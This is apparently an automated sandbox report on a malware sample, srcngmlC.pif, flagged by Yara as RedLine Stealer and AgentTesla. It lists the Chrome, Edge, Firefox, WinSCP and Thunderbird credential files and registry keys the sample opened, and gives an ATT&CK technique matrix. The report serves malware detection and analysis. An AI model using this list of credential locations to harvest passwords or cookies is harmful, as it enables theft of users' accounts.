Source: Yara match	File source: 12.2.srcngmlC.pif.3dce0ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3eeb5b90.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3dce0ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.344a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.32f65b90.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.31c60fae.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.31bd00c6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.344a0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.409b0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3dce0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3da100c6.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.31bd0fae.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3da10fae.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.31c600c6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.31bd00c6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3dce0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34b10000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.34c10000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1942547850.0000000031F64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1877750905.0000000031F54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2933322220.000000003DEB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: srcngmlC.pif PID: 5660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: srcngmlC.pif PID: 6348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: srcngmlC.pif PID: 6164, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: 8.2.srcngmlC.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.srcngmlC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.srcngmlC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1851440244.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1851440244.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2903058685.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.1903364195.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.1683699497.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2903058685.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1918672427.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1705935072.000000007EA90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.1903364195.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000001.1833365375.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1918672427.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1683696452.000000007EA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.1683699497.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000001.1833365375.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\Public\Libraries\srcngmlC.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\srcngmlC.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Libraries\srcngmlC.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\srcngmlC.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\srcngmlC.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\Libraries\srcngmlC.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\srcngmlC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\srcngmlC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\srcngmlC.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\srcngmlC.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\srcngmlC.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 12.2.srcngmlC.pif.3eeb5b90.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.31c600c6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34490ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.32f65b90.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34490ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34490000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.32f55b90.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3da10fae.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34490000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3da100c6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.344a0ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.409b0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.31bd0fae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34b10000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3dce0ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3eeb5b90.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3dce0ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.344a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.32f65b90.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.31c60fae.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.31bd00c6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.344a0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.409b0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3dce0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3da100c6.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.31bd0fae.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3da10fae.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.31c600c6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.31bd00c6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3dce0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34b10000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.34c10000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1942547850.0000000031F64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1877750905.0000000031F54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2933322220.000000003DEB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: srcngmlC.pif PID: 5660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: srcngmlC.pif PID: 6348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: srcngmlC.pif PID: 6164, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 12.2.srcngmlC.pif.3eeb5b90.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.31c600c6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34490ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.32f65b90.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34490ee8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34490000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.32f55b90.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3da10fae.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34490000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3da100c6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.344a0ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.409b0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.31bd0fae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34b10000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3dce0ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3eeb5b90.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3dce0ee8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.344a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.32f65b90.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.31c60fae.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.31bd00c6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.344a0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.409b0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3dce0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3da100c6.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.31bd0fae.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3da10fae.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.31c600c6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.31bd00c6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.3dce0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.34b10000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.34c10000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1942547850.0000000031F64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1877750905.0000000031F54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2933322220.000000003DEB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: srcngmlC.pif PID: 5660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: srcngmlC.pif PID: 6348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: srcngmlC.pif PID: 6164, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: 8.2.srcngmlC.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.srcngmlC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.srcngmlC.pif.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.srcngmlC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.srcngmlC.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1851440244.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1851440244.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2903058685.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.1903364195.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.1683699497.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2903058685.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1918672427.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1705935072.000000007EA90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.1903364195.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000001.1833365375.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1918672427.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1683696452.000000007EA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.1683699497.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000001.1833365375.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Valid Accounts	121 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	1 Valid Accounts	11 Deobfuscate/Decode Files or Information	211 Input Capture	1 System Network Connections Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Valid Accounts	1 Access Token Manipulation	2 Obfuscated Files or Information	1 Credentials in Registry	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	3 Software Packing	NTDS	47 System Information Discovery	Distributed Component Object Model	1 Email Collection	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Registry Run Keys / Startup Folder	311 Process Injection	1 Timestomp	LSA Secrets	1 Query Registry	SSH	211 Input Capture	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	261 Security Software Discovery	VNC	1 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Masquerading	DCSync	131 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
